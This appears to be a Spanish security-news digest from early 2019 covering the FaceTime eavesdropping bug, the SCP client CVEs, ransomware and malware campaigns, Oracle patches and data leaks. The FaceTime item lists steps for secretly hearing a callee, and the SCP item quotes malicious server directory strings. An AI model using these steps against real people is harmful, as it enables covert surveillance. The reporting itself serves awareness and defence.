¿Podría WhatsApp estar exponiendo tus mensajes?

Saltan las alarmas cuando leemos que una empresa puede estar tratando nuestros datos de manera irregular, y como no, WhatsApp siempre está en el punto de mira.

Las muchas noticias sobre fallos en Whatsapp y Facebook (su comprador) han conseguido generar desconfianza en la aplicación, tal es así que muchos de vosotros habéis optado por aplicaciones de mensajería alternativas.

WhatsApp no parece tener un error que exponga los mensajes de sus usuarios, simplemente, así es como fnciona el servicio.

Todo el revuelo sobre la exposición de mensajes empezó a raíz del siguiente tweet:

logged into whatsapp with a new phone number today and the message history from the previous number’s owner was right there?! this doesn’t seem right.

— Abby Fuller (@abbyfuller) 11 de enero de 2019

A partir de aquí se empezó a sugerir que la conocida aplicación de mensajería podría tener un error de privacidad enorme y podría estar exponiendo, bajo ciertas circunstancias, algunos de nuestros mensajes a otros usuarios.

Si leemos el Tweet de Abby Fuller comenta que, cuando instaló WhatsApp en su nuevo teléfono, con su nuevo número, encontró lo que sería el historial de mensajes del propietario anterior del mismo número.

Ya que para WhatsApp nuestro número de teléfono es nuestro nombre de usuario y la contraseña es la OTP (One-Time Password o contraseña de un solo uso) que envían a ese mismo número, no es una vulnerabilidad, así es como funciona el servicio.

WhatsApp mencionó en su blog que “common practice for mobile providers to recycle numbers, you should expect that your former number will be reassigned”

“Es una práctica común que los proveedores de servicios móviles reciclen números, es de esperar que su anterior número sea reasignado.”

En sus tweets, Fuller dijo que el historial de mensajes “no era completo, pero eran conversaciones reales” Queda por confirmar si esos mensajes incluían algún mensaje enviado por el anterior propietario del número.

A pesar de todo, la configuración de WhatsApp en un nuevo dispositivio con un número de teléfono nuevo no permite restaurar el archivo de mensajes del propietario anterior porque la empresa nunca realiza copias de seguridad de las conversaciones cifradas en sus servidores, actualmente las copias de seguridad de WhatsApp son almacenadas en nuestro Google Drive o localmente en el dispositivo.

Sin embargo, la empresa de mensajería mantiene los mensajes pendientes 45 días en su servidor hasta que el destinatario está en línea y los puede entregar. Después de esos 45 días los mensajes son eliminados.

Esto sugiere que los mensajes que Fuller encontró en su nueva cuenta de WhatsApp fueron, probablemente, mensajes no entregados que enviaron los contactos del antiguo propietario antes de que éste dejara de usar el número.

Para evitar que sus mensajes anteriores lleguen a otros dispositivos, WhatsApp recomienda a los usuarios eliminar su cuenta antes de dejar de usar una tarjeta SIM o cambiar de cuenta con la función “cambiar de número” que está disponible en la configuración de la APP.

Esto es lo que podría haber pasado

Algunos usuarios de sitios web como Reddit o Twitter sugieren que el mecanismo de eliminación de mensajes tras los 45 días en los servidores de WhatsApp contiene un error que, eventualmente, mantiene los mensaje sin entregar almacenados en el servidor de la compañía durante más tiempo. Pero todavía queda un detalle importante por mencionar, El antiguo usuario del número no necesitaba su tarjeta SIM para seguir usando su cuenta de WhatsApp, una vez que esté configurada en el teléfono. Eso significa que es probable que el antiguo propietario del número aún estuviera usando su cuenta después de deshacerse de su SIM hasta que Fuller configuró el mismo número y verificó la cuenta usando el OPT recibido.

Fuentes

https://faq.whatsapp.com/en/s40/28030001/
https://thehackernews.com/2019/01/whatsapp-privacy-chats.html

Fallo en Twitter expone tweets privados en Android

Un error en la aplicación para Android de Twitter deja abierta la posibilidad de acceder a tweets protegidos. Este fallo existe desde 2014, como podemos ver en la publicación de Twitter del pasado 17 de este mes.

Autor fayerwayer.com

Si se da el caso en el que quieres que tus tweets sean privados, Twitter te da la opción “proteger tus tweets”, lo que obliga a otros usuarios a seguirte para poder ver tu contenido. Pero si utilizas Android es posible que tus tweets hayan estado públicos debido a un fallo de la aplicación. El problema lo provocó que Twitter deshabilitara la configuración “proteger tus tweets” a los usuarios que realizaron ciertos cambios en la configuración de su cuenta, como cambiar la dirección de email asociada a la cuenta.

La compañía ha afirmado que este problema se ha resuelto a principios de esta semana y que tan solo afecta a dispositivos Android. Las versiones web e iOS no se han visto afectadas. Los usuarios que hayan visto vulnerada su privacidad ya fueron avisados. No es la primera vez que Twitter tiene problemas a la hora de asegurar nuestra privacidad, si recordamos, hace unos meses la red social expuso mensajes privados de sus usuarios.

Para asegurarte de que tu cuenta está protegida puedes acceder dentro de la aplicación de Twitter a la opción de “Configuración y privacidad” y una vez allí a “Privacidad y seguridad”. Ahí encontrarás la opción de “Proteger mis tweets”, donde podrás ver si está protegida o no.

Más información:

Twitter:
https://help.twitter.com/en/protected-tweets-android

Theverge
https://www.theverge.com/2019/1/17/18187143/twitter-bug-android-protected-tweets-turned-off

Bug en iPhone FaceTime permite escuchar y ver a la otra persona antes de descolgar

Ha sido encontrado un fallo en la aplicación de videoconferencias FaceTime, disponible tanto en iOS como en Mac por defecto, que permite escuchar y ver a la persona que se está llamando antes de que ésta acepte la llamada.

El fallo es reproducible tanto en iPhone como Mac sin necesidad de conocimientos técnicos y sin que la otra persona se dé cuenta de que está siendo espiada. Para la explotación, no se requieren conocimientos técnicos, aunque si se quiere obtener también vídeo el método es más complicado. Para obtener sólo el audio deben seguirse los siguientes pasos:

1. Comenzar una llamada usando FaceTime con otro contacto.
2. Mientras la llamada queda a la espera de aceptación, deslizar hacia arriba para acceder al menú de la llamada, y pulsar en “Añadir persona”.
3. Añade tu propio número de teléfono a la llamada.
4. Listo. Comenzará una llamada grupal entre tú mismo y la persona afectada, sin necesidad de que acepte la llamada grupal.

Para obtener además el vídeo, existen diferentes métodos. Según @Jessassin, si otro dispositivo accede a la llamada mediante invitación, la víctima transmitirá también su vídeo. Otra opción, es si la víctima pulsa el botón de encendido en la pantalla de desbloqueo, tras lo cual también enviará el vídeo.

Now you can answer for yourself on FaceTime even if they don’t answer#Apple explain this.. pic.twitter.com/gr8llRKZxJ

— Benji Mobb (@BmManski) January 28, 2019

El fallo se ha vuelto popular en la redes sociales bajo el “hashtag” #facetimebug, con usuarios probando por sí mismos el fallo para su asombro. Desde Apple ya han confirmado el error, y van a solucionarlo en una actualización de seguridad esta misma semana. Para evitar ser víctima de este error, se recomienda desactivar Facetime accediendo al menú de opciones del Iphone, acceder al botón de FaceTime, y pulsar en el primer interruptor para ponerlo en gris.

Actualización: debido a la repercusión que ha tenido el bug, Apple ha decidido deshabilitar las llamadas grupales.

Fuente:

Major iPhone FaceTime bug lets you hear the audio of the person you are calling … before they pick up:
https://9to5mac.com/2019/01/28/facetime-bug-hear-audio/

Aparecen dos nuevas campañas de malware que se propagan a través de macros de MS Word

Investigadores de seguridad han descubierto dos nuevas campañas de malware, una de las cuales distribuye el troyano Ursnif, mientras que la otra además de propagar el mismo malware, infecta al objetivo con el ransomware GandCrab.

Aunque ambas campañas parecen ser trabajo de grupos de ciberdelincuentes separados, hay muchas similitudes en su ‘modus operandi‘.

Similitudes del ataque:

Ambos ataques comienzan con correos eletrónicos en la que suplantan la identidad de un conocido para adjuntar un documento de Microsoft Word. Este documento contiene macros de VBS maliciosas que hacen uso de Powershell para ejecutar su carga útil e infectar al objetivo.

Infección de Ursnif & GandCrab:

Como hemos explicado, el documento de MS Word contiene una macro maliciosa en VBS. Si esta se ejecuta con éxito, hace uso de Powershell para descargar y ejecutar tanto Ursnif como GandCrab en los sistemas infectados. En la siguiente imagen se puede ver de manera más clara:

La primera carga útil es una línea de Powershell codeada en base64 la cual evalúa la arquitectura del sistema objetivo y, dependiendo de la misma, descarga una carga adicional de Pastebin. Esta se ejecuta en memoria para hacer bypass de los antivirus comunes.

Finalmente, la carga útil instala una variante del ransomware GandCrab en el sistema de la víctima, bloqueándolo hasta que pague el rescate pertinente.

Infección de Ursnif:

Al igual que el anterior malware comentado, hace uso de macros VBS sobre un documento Word malicioso para iniciar la infección.

En este caso, una vez que se ha ejecutado, el malware recopilar información del sistema, la coloca en un archivo con formato CAB y la envía a su C&C a través de una conexión HTTPS.

Los investigadores de la compañía Talos han publicado una lista de indicadores de compromiso, junto con los nombres de los nombres de archivo de carga que utilizan sobre las máquinas comprometidas.

Más información:

Publicación de Carbon Black sobre GandCrab:
https://www.carbonblack.com/2019/01/24/carbon-black-tau-threatsight-analysis-gandcrab-and-ursnif-campaign/

Publicación de Talos sobre Ursnif:
https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html

‘STOP Ransomware’ aumenta el número de victimas en los últimos meses

Desde el mes de diciembre han aparecido múltiples variantes del ransomware conocido como ‘STOP ransomware’ que han infectado miles de usuarios.

Estas variantes del ransomware incluyen una peculiaridad que podría utilizarse para recuperar ciertos ficheros, y es que cifra únicamente los primeros 153600 bytes del fichero. Por el momento, el investigador y analista de malware, Michael Gillespie, ha publicado una herramienta que permite descifrar los ficheros cifrados utilizando la clave maestra que incluye por defecto el ransomware. Aun no existe una herramienta que permita el descifrado de ficheros cifrados utilizando las claves proporcionadas por el servidor de control puesto que los atacantes las cambian continuamente.

Se detecta una familia de Ransomware, Anatova

McAfee ha publicado una noticia en la que anuncia (y alerta) una nueva familia de Ransomware detectada, la cual han bautizado con el nombre de Anatova.

La detección de esta familia se realizó a través de redes P2P privadas, y se cree que Anatova puede ser un peligro serio para la red en general debido a la extensión modular con la que se ha creado el malware y al auto cifrado del que dispone sus recursos a través de estas redes.

El método de entrada que utiliza Anatova normalmente es el engaño de la víctima a través de un camuflado de su iconos con uno de juegos o aplicaciones conocidas en estas redes P2P, lo que lo hace más amigable para las víctimas.

El objetivo de la familia, como todo ransomware es el cifrado de todos los documentos de la máquina infectada para después pedir un rescate en criptomonedas, que en las muestras analizadas asciende a 10 DASH, que al cambio a dólares son unos 700$. Aunque esta muestra también es capaz de cifrar archivos compartidos en unidades montadas en el sistema.

Sobre el proceso de cifrado, los investigadores de McAfee  que descubrieron el malware alertan de que será imposible la creación de un software para desinfectar el sistema y recuperar los archivos cifrados, debido a que la muestra genera un par de claves RSA para el cifrado de los archivos para cada usuario.

El malware en cuestión analizado, dispone del hash ‘170fb7438316f7335f34fa1a431afc1676a786f1ad9dee63d78c3f5efd3a0ac0’ y cuenta con unas técnicas que dificultan su análisis:

• Cifrado de la mayoría de las cadenas de texto utilizadas.
• Llamadas a funciones utilizadas de forma dinámica.
• Protección anti-debug que hace que en las fases de análisis estático encuentre el final del programa rápidamente.

A parte de estos comportamientos avanzados, también cuenta con otras comprobaciones que hace que el malware no se ejecute como puede ser el nombre de usuarios del sistema, el  entorno de ejecución o el lenguaje del sistema.

Esta familia no afectará a las máquinas en países de la CEI, Siria, Egipto, Marruecos, Irak e India. Un comportamiento que a menudo es habitual en los creadores de este tipo de malware, lo que puede dar pistas del lugar de origen de la muestra.

Tambien han publicado una gráfica con las detecciones en varios paises, Siendo los Estados Unidos donde más muestras se han detectado, aunque afecta seriamente a los países Europeos.

Más información:
Blog de McAfee
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

Oracle corrige 284 vulnerabilidades en su actualización de seguridad de enero

Oracle publica su actualización correspondiente al mes de abril. Contiene parches para 284 nuevas vulnerabilidades diferentes en múltiples productos pertenecientes a diferentes familias, que van desde el popular gestor de base de datos Oracle Database hasta Solaris, Java o MySQL.

Los fallos se dan en varios componentes de múltiples productos y como es habitual la lista completa de productos afectados es cada vez más extensa. Se concreta en las siguientes familias:

• Oracle Database Server
• Oracle Communications Applications
• Oracle Construction and Engineering Suite
• Oracle E-Business Suite
• Oracle Enterprise Manager Products Suite
• Oracle Financial Services Applications
• Oracle Food and Beverage Applications
• Oracle Fusion Middleware
• Oracle Health Sciences Applications
• Oracle Hospitality Applications
• Oracle Hyperion
• Oracle Insurance Applications
• Oracle Java SE
• Oracle JD Edwards Products
• Oracle MySQL
• Oracle PeopleSoft Products
• Oracle Retail Applications
• Oracle Siebel CRM
• Oracle Sun Systems Products Suite
• Oracle Supply Chain Products Suite
• Oracle Support Tools
• Oracle Utilities Applications
• Oracle Virtualization

A continuación ofrecemos una relación de productos y el número de vulnerabilidades corregidas:

• Tres nuevas vulnerabilidades corregidas en Oracle Database Server, ninguna es explotable de forma remota sin autenticación.

• 33 nuevas vulnerabilidades afectan a Oracle Communications (29 de ellas podrían ser explotadas por un atacante remoto sin autenticar).

• 4 nuevos parches para la suite Oracle Construction and Engineering, todas explotables remotamente sin autenticación.

• Otras 16 vulnerabilidades explotables de forma remota y sin autenticación en la suite de Oracle E-Business.

• 11 nuevas vulnerabilidades en Oracle Enterprise Manager (9 de ellas explotables remotamente por un usuario sin autenticar).

• Otros 9 parches que solucionan vulnerabilidades explotables remotamente y sin autenticación en Oracle Financial Services.

• 6 nuevos parches para las aplicaciones de Oracle Food and Beverage (3 de ellos solucionan vulnerabilidades explotables por un usuario remoto no autenticado).

• 62 parches para Oracle Fusion Middleware (57 de estos arreglan fallos que pueden ser explotables de forma remota sin autenticación).

• 6 vulnerabilidades en Oracle Health Sciences, de las cuales, 2 podrían ser explotadas por un atacante remoto sin autenticar.

• 5 nuevas vulnerabilidades en Oracle Hospitality Applications (ninguna de ellas es explotable remotamente sin autenticación).

• Una vulnerabilidad en Oracle Hyperion, no explotable de forma remota.

• Referente a Oracle Insurance Applications, se han publicado 5 nuevos parches, tres de los cuales son explotables de forma remota sin autenticación.

• En cuanto a Oracle Java SE, se han corregido 5 nuevas vulnerabilidades que pueden ser explotadas por un atacante remoto sin autenticar.

• La actualización para Oracle JD Edwards corrige 2 vulnerabilidades explotables remotamente sin autentcación.

• Otras 30 actualizaciones de seguridad para Oracle MySQL (3 de ellas corrigen vulnerabilidades explotables de forma remota sin autenticación).

• Una actualización en Oracle People Soft soluciona 20 problemas de seguridad, 15 de ellos pueden ser explotados por un atacante remoto sin autenticar.

• También se solucionan 16 nuevas vulnerabilidades en Oracle Retail Applications (15 de ellas son explotables de forma remota sin autenticación).

• Un nuevo parche para Oracle Siebel CRM que corrige una vulnerabilidad explotable remotamente.

• 11 nuevas vulnerabilidades para Oracle Sun Systems (5 de ellas podrían ser explotadas por un atacante remoto sin autenticación).

• Otras 5 actualizaciones de seguridad para Oracle Supply Chain, 4 de estas podrían ser explotadas de forma remota sin autenticación.

• Una vulnerabilidad en Oracle Support Tools, que podría ser explotada remotamente.

• Adicionalmente se solucionan 2 nuevas vulnerabilidades en Oracle Utilities Applications, ambas serían explotables por un atacante remoto sin autenticar.

• Por último, también se ha publicado una actualización que soluciona 30 fallos de seguridad en Oracle Virtualization (4 de estos fallos podría ser explotados por un atacante remoto sin autenticación).

Se recomienda comprobar las matrices de productos afectados, gravedad y la disponibilidad de parches, disponibles desde la notificación oficial en:

Oracle Critical Patch Update Advisory – January 2019
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html

Vulnerabilidades en SCP permiten escritura de ficheros arbitrarios en el cliente

La vulnerabilidad principal, que data de hace 35 años, afecta a OpenSSH SCP, PuTTY PSCP y WinSCP. El fallo permite al servidor escribir ficheros en el cliente sin que se dé cuenta.

SCP es una herramienta para transferir ficheros a través de SSH empleada por administradores de todo el mundo, y que cuenta con múltiples implementaciones para diferentes sistemas, como OpenSSH, PuTTY o WinSCP. El fallo descubierto, permitiría a un servidor malicioso copiar ficheros no solicitados en el equipo del cliente sin informarse de ello.

Un posible caso de explotación, tal y como detalla sintonen.fi, sería un ataque MitM (Man in the Middle) entre un administrador y un servidor que administre, para que al utilizar scp se copie a su máquina un fichero ‘.bash_aliases’ en su directorio de usuario que permita al atacante ejecutar cualquier comando en la máquina del sysadmin. Este tipo de ataque requiere que la víctima acepte el cambio de fingerprint en el servidor.

El problema principal, que se encuentra desde 1983 (hace 35 años), tiene como origen el protocolo RCP del proyecto BSD, que es en el que se basa SCP. Debido al error la mayoría de clientes SCP no validan correctamente que los ficheros devueltos por el servidor son aquellos que se solicitó. Las vulnerabilidades en concreto son:

• CWE-20 (CVE-2018-20685):  validación incorrecta del nombre de directorio. El servidor puede cambiar permisos de la carpeta utilizando un nombre de carpeta vacío (“D0777 0 \n”) o con punto (“D0777 0 .\n”).
• CWE-20 (CVE-2019-6111 y CVE-2018-20684 en WinSCP): debido al estándar derivado de rcp de 1983, es el servidor el que establece los ficheros que se copian al cliente sin que se valide. Si se utiliza el parámetro “-r”, también pueden copiarse carpetas sin validación.
• CWE-451 (CVE-2019-6109): spoofing en el cliente utilizando el nombre del objeto. Mediante dicho nombre, pueden escribirse caracteres ANSI que modifiquen la salida, para por ejemplo ocultar archivos transferidos.
• CWE-451 (CVE-2019-6110): spoofing en el cliente utilizando stderr. Similar al anterior, pero aprovechando que el servidor puede escribir una salida de error en el cliente.

Algunos de los clientes afectados son OpenSSH scp (versiones anteriores a 7.9), PuTTY PSCP (todavía sin parche), y WinSCP scp (hasta la versión 5.13). Una posible solución si el cliente lo permite (como OpenSSH) es cambiar el protocolo a SFTP, aunque los servidores utilizados deben de soportar dicho protocolo. Otros clientes o programas que empleen SCP pueden encontrarse afectados.

Fuente:

scp client multiple vulnerabilities:
https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt

Adobe parchea dos vulnerabilidades graves en Acrobat y Reader

Los investigadores de Trend Micro’s Zero Day Initiative Abdul-Aziz Hariri y Sebastian Apelt, han reportado a Adobe dos importantes vulnerabilidades en Adobe Acrobat y Adobe Readerpara Windows y MacOS que permiten el compromiso total del sistema con tan solo abrir un fichero PDF.

Adobe no hay dado de momento más detalles acerca de las vulnerabilidades a pesar de estar clasificadas con criticidad alta, ya que se permite la escalada de privilegios y la ejecución arbitraria de código.

La primera vulnerabilidad, reportada por Apelt, es un use-after-free que puede conducir a la ejecución remota de código. Ésta tiene el identificador CVE-2018-16011.

La segunda falla, descubierta por Hariri y con identificador CVE-2018-19725, permite la escalada de privilegios

Las versiones afectadas son Acrobat and Reader DC 2015 version 2015.006.30461 y anteriores, 2017 version 2017.011.30110 y anteriores, versión Continuous 2019.010.20064 y anteriores, tanto para Mac como paraWindows.

Más información:

https://thehackernews.com/2019/01/adobe-reader-vulnerabilities.html

https://helpx.adobe.com/security/products/acrobat/apsb19-02.html

La NSA lanzará su herramienta de ingeniería inversa GHIDRA

La Agencia de Seguridad Nacional de los Estados Unidos (NSA) planea lanzar gratuitamente su herramienta de ingeniería inversa (de aquí en adelante reversing) desarrollada internamente en la próxima conferencia de seguridad RSA 2019, que tendrá lugar en San Francisco durante el mes de marzo.

La existencia de este software fue revelada públicamente por primera vez en las filtraciones de la CIA Vault 7, pero ha pasado desapercibida hasta que Robert Joyce anunció su lanzamiento público en su descripción de la sesión de la conferencia RSA.

¿Qué es GHIDRA?

GHIDRA es un marco de trabajo de reversing desarrollado por NSA y utilizado por la misma durante más de una década.

La herramienta está escrita en Java y desde que salió a la luz se han hecho numerosas comparaciones con el conocido software IDA. Incluso hay varios hilos de Reddit como este en el que aparecen ex-empleados de la agencia que dan su opinión junto con algunos detalles del funcionamiento del programa.

¿Va a ser de código abierto?

Se está hablando mucho de la posibilidad de que la herramienta sea de código abierto. De ser así, el mantenimiento y mejora de la misma sería más cómodo, pero la NSA no suele ser partidaria de compartir su conocimiento (como bien sabemos…).

A día de hoy no hay comunicado oficial de si será publicado el código o no, pero nos mantendremos a la espera para comprobar que ocurre el día 5 de marzo y si veremos el código publicado en el Github de la NSA.

Más información:

Enlace a Vault 7:
https://wikileaks.org/ciav7p1/cms/page_9536070.htm

Enlace a descripción de Robert Joyce:
https://www.rsaconference.com/events/us19/agenda/sessions/16608-come-get-your-free-nsa-reverse-engineering-tool

Ethereum Classic sufre un ataque 51%

La popular serie de atresmedia “La casa de papel” en la que una banda organizada entra en la casa de moneda y timbre con el objetivo de robar millones de euros parece cobrar vida en la red. A grandes rasgos, un supuesto grupo organizado ha robado 1,5 millones de dólares haciéndose con el 63% de la tasa total de hash de la red de Ethereum.

El ataque

¿Qué es un ataque 51%?
Las criptomonedas están basadas en redes distribuidas y descentralizadas con la intención de que cualquiera pueda acceder a ellas de manera más o menos sencilla, o lo que es lo mismo, una democracia digital en la que 100 hipotéticos usuarios controlan las transacciones. Si alguien pudiese controlar 51 de esos 100 usuarios con derecho a voto, tendría el control total de la red, lo que daría lugar a la posibilidad de crear una bifurcación de la red o incluso bloques falsos.

Ethereum Classic ha sido, supuestamente, víctima de este tipo de ataque. El pasado día 6 de enero la empresa china SlowMist hacía pitar las alarmas, al poco tiempo, un analista de CoinNess que investigaba el suceso descubrió que un grupo privado había logrado aumentar su poder de hash a 3.263GH/s (300GH/s de tasa normal), logrando ser el grupo minero más poderoso durante un breve período de tiempo en el que podría haberles dado tiempo a robar 88.500 Ethereum Classic (ETC), el equivalente a 460.000 dólares. Pero no acabó ahí, unas 10 horas más tarde volvía a aumentar su tasa de hash.

Coinbase, una de las webs más reconocida para el intercambio, compra y venta de criptomonedas, detuvo todas las transacciones de Ethereum Classic. El exchange descubrió otros 12 ataques que tenían relación con Ethereum y los gastos dobles, ascendiendo la cantidad a 219.500 ETC o 1,1 millones de dólares al cambio.

La empresa

Para la sorpresa de muchos, los desarrolladores de la criptomoneda afirman que el blockchain no ha sido objetivo de ningún ataque, además de negar la noticia del doble gasto. Todo el revuelo lo achacan a una “reorganización profunda de la cadena de bloques”, tal y como dicen en su twitter.

On 1/5/2019, Coinbase detected a deep chain reorganization of the Ethereum Classic blockchain that included a double spend. In order to protect customer funds, we immediately paused movements of these funds on the ETC blockchain. Read more here: https://t.co/vCx89dz44m

— Coinbase (@coinbase) 7 de enero de 2019

Los desarrolladores de ETC respondieron rápidamente a las acusaciones afirmando que un grupo de mineros estaban siendo “poco honestos” ejerciendo una minería egoísta. Además explicaron que el fabricante linzhi estaba en proceso de probar nuevas máquinas Ethash, lo que resultó en una subida de más del 50% en la tasa de hash, no teniendo nada que ver esto con un ataque 51%. También dieron respuesta al tema de los gastos dobles alegando no haberlos detectado.

A pesar de la respuesta por parte del equipo de Ethereum Classics, Coinbase sigue bloqueando las transacciones de ETC y está monitorizando la moneda para determinar la actividad en el futuro.

Contramedidas de las casas de cambio

Pocas son las casa de cambio que han emitido algún tipo de comunicado que tenga relación al supuesto ataque 51%, pero alguna de ellas han detenido el retiro y depósito de la criptomoneda.

Coinbase comunicó que sus fondos no fueron afectados ya que detuvieron las transacciones a tiempo

Poloniex tiene bloqueadas las transacciones hasta el día 9 o nuevo aviso a la espera de que la red de Ethereum se estabilice, tal y como dijo por twitter, y aseguran que los fondos de los usuarios se encuentran a salvo.

Due to a potential 51% attack, ETC wallets have been disabled and will not be re-enabled until tomorrow (at the very earliest). We will update this thread when we have a firmer timeline for re-enabling deposits and withdrawals. Poloniex was not affected, and your fund are safe.

— Poloniex Exchange (@Poloniex) 7 de enero de 2019

Kraken han detenido las transacciones hasta nuevo aviso, aquí podemos consultar el estado y las noticias.

OKEx, casa de cambio china, aseguran que sus clientes no se ven afectados y mantienen el depósito y retirada de ETC habilitado. Para el depósito de ETC será necesario un mínimo de 100 confirmaciones, ypara la retirada serán necesarias 400. Además continúan monitorizando la situación por si hubiera que tomar otro tipo de medidas.

Binance y Bitfly también han aumentado el número de confirmaciones.

Gate.io confirmó que el doble gasto afectó a sus fondos, la plataforma detectó 7 transacciones relativas al ataque. El atacante transfirió un total de 54.200 ETC a través de 4 direcciones. La casa de cambio bloqueó el ataque al poco de producirse pero generó una pérdida total de 40.000 ETC para la plataforma, unos 199.600 dólares.

El ataque de 51% a Ethereum Classic sigue en desarrollo y sus representantes no han brindado mayores detalles desde el pasado lunes. Por esta razón, es posible que otras casas de cambio tomen medidas o reporten pérdidas de fondos en ETC.

Más información
Definición de blockchain
Blog coinbase

Fuentes
https://www.criptonoticias.com/seguridad/casas-cambio-toman-medidas-ataque-51-porciento-ethereum-classic/
https://bitcoin.es/actualidad/los-hackers-de-ethereum-classic-roban-1-5-millones-con-un-ataque-51/
https://criptoinforme.com/los-desarrolladores-de-ethereum-classic-etc-niegan-un-ataque-del-51/

Importante filtración de datos afecta a políticos alemanes, incluyendo a Ángela Merkel

El pasado 28 de diciembre se descubrió que desde las cuentas de twitter @_0rbit y @_0rbiter (actualmente suspendidas) se publicaban enlaces con acceso a información privada de cientos de políticos, periodistas y otras figuras públicas alemanas.

Twitter donde se publicó la filtración de datos.

Se desconoce quién puede estar detrás de este ataque pero se especula que parte de la información ha podido ser extraída de los smartphones de los afectados.

Las filtraciones muestran una gran cantidad de datos sobre políticos y figuras públicas entre los que se encuentran la canciller Angela Merkel o el presidente Frank-Walter Steinmeier. Se incluyen fotos y registros de chat, direcciones privadas, números de teléfono, skype y direcciones de correo, aunque estos son los que menos. Los atacantes comprometieron las cuentas de Outlook, Twitter y Facebook para extraer información.

Algunos archivos se remontan a 2009, y otros datos e imágenes fueron publicadas en Pastebin en 2017. aunque el equipo de Computer Business Review encontró cartas bastante recientes a nivel ministerial enviadas entre compañeros.

Por lo que se aprecia en la forma de filtrar los datos este ataque no ha sido repentino, sino que se ha ejecutado de forma premeditada, preparando decenas de mirrors con los archivos listos para descargar, links intermediarios detallados con la información a descargar con variosmirrors de los mismos archivos por si alguno fallaba.

El objetivo principal han sido todos los partidos políticos alemanes que actualmente están representados en el parlamento, exceptuando el partido de extrema derecha Alternative for German (AfG).

El o los atacantes comenzaron a publicar un enlace con varios links de descarga al día desde el 1 de diciembre de este año. Pero al ver que no tenían repercusión, utilizaron la cuenta de twitter, presuntamente hackeada, del youtuber Simon Unge, que tiene 2 millones de seguidores y publicaron un link al blog donde se podía acceder a los datos robados.

La oficina federal alemana de la seguridad de la información (BSI) está investigando el ataque. Exponen que no se han visto afectadas las redes gubernamentales por el incidente, y que desconocen quién es el o los autores y cuál es el motivo de este ataque.

Más información:

Computer Business Review
https://www.cbronline.com/news/german-data-leak

Revisión de las CVE del 2018

A pocos días de acabar el año 2018 quedan bastante claras las tendencias en las CVE a lo largo del mismo. Por ejemplo, los productos de los que se han reportado más vulnerabilidades han sido Debian, Android y Ubuntu; mientras que las empresas de las que se han reportado más han sido Debian, Google y Oracle; o los tipos de CVE más comunes han sido las ejecuciones de código indeseado, el desbordamiento y los ataques DoS.

Extraído de cerounosoftware.com.mx

La explotacion de vulnerabilidades es una de las estrategias preferidas por los atacantes, siendo las CVE un objetivo clave para muchas familias de malware. Por lo que el incremento de las detecciones de las mismas permite subsanarlas con mayor rapidez para evitar que esas brechas de seguridad sigan disponibles.

El promedio de CVE publicadas en 2018 está en torno a las 46 diarias, casi 6 más que el año pasado. Puede resultar sorprendente que el producto con más CVE reportadas sea precisamente Debian, aunque no hay que olvidar que cuenta con una gran comunidad de respaldo que vigila continuamente cualquier fallo de seguridad para su subsanación. No obstante, los fabricantes con más vulnerabilidades en 2018 fueron Debian (890), Google (712), Oracle (690) y Microsoft (673), mientras que los productos más reportados fueron Debian Linux (889), Android (549) y Ubuntu Linux (451). Por otro lado, los tipos de CVE que más se reportaron en 2018 fueron la ejecución de código no deseado (22%), los ataques por desbordamiento (18%) y los ataques DoS (11%); mientras que los menos reportados fueron por su parte la división de respuesta HTTP (0,1%), la inserción de archivos (0,2%) y la elevación de privilegios (2,5%).

Respecto a la gravedad de las CVE reportadas, el promedio del año no ha alcanzado el nivel 6, siendo menos del 10% superior al nivel 8 y poco más del 41% inferior al nivel 5.

Luciano Miguel Tobaria

lmiguel@hispasec.com

Más información:

• Top 50 productos de 2018 (CVE details)
• Top 50 empresas de 2018 (CVE details)
• Vulnerabilidades por tipo de 2018 (CVE details)
• CVE security vulnerabilities published in 2018 (CVE details)
• CVSS score distribution (CVE details)
• Vulnerabilidades en 2018 llegaron a nuevo máximo histórico (Segu·Info)
• Máximo histórico para las vulnerabilidades en 2017 (WeLiveSecurity)

Ejecución de código remoto en Cscape de Horner Automation

Cscape es un software libre destinado a la programación de controladores lógicos programables o PLC (Programmable Logic Controller) desarrollado por la empresa Horner Automation. Los PLCs son muy utilizados en la industria para automatizar procesos electromecánicos tales como controlar la lógica de funcionamiento de máquinas, plantas y procesos industriales.

Se ha publicado una vulnerabilidad que podría permitir la ejecución remota de código arbitrario en el software de programación Cscape. El error de seguridad se debe a una falta de comprobación de las entradas suministradas por el usuario que podría provocar una escritura fuera de los limites del ‘buffer’ asignado al procesar un fichero CSP especialmente manipulado. Para lograr explotar la vulnerabilidad con éxito es necesaria la interacción del usuario, que podría ser engañado para visitar una página o abrir un archivo malicioso.

La vulnerabilidad, a la que se ha asignado el identificador CVE-2018-19005, fue descubierta por los investigadores de seguridad ‘rgod’ y ‘mdm’ del equipo ‘9SG Security Team’ de ‘Trend Micro’s Zero Day Initiative’ el pasado mes de Julio pero no ha sido hecha pública hasta el inicio del nuevo año para permitir a la empresa desarrolladora solventar el fallo.

Más Información:

Horner Automation Cscape CSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability:
https://www.zerodayinitiative.com/advisories/ZDI-19-1434/

Ransomware paraliza la producción de los principales periódicos de EEUU

El pasado fin de semana, Tribune Publishing Co, empresa que produce los principales periódicos de Estados Unidos, fue víctima de una infección por ransomware de la familia Ryuk que paralizó la impresión y las entregas de varios periódicos importantes del país. Entre los periódicos afectados se encuentran Los Angeles Times y Wall Street Journal.

El malware Ryuk comparte bastante similitud con la familia de ransomware Hermes. Está asociado al Grupo Lazarus y se suele distribuir mediante ataques APT, a diferencia de la gran mayoría de este tipo de ataques que basan su propagación en spam o explotación masiva de vulnerabilidades.

Este malware crea dos notas de rescate, según información publicada por la empresa Checkpoint y pide como rescate entre 15 y 50 BTC.

Ryuk asocia a cada infección un ‘wallet’ único, lo que hace altamente complicado seguir el flujo del dinero y estimar el volumen de infecciones. Como es normal en estos casos, una vez el dinero es obtenido se mueve entre varias cuentas para dificultar el seguimiento del mismo.

Desde Hispasec trabajamos con empresas de todo el mundo para tratar de mitigar su exposición a este tipo de amenazas.  Dotamos a nuestros clientes de elevados niveles de protección a través de planes de seguridad. Estos planes cubren la infraestructura interna y externa, procesos formativos y de concienciación a empleados y proporcionan servicios globales de consultoría y auditoría de sistemas, así como simulación de ataques de ransomware.

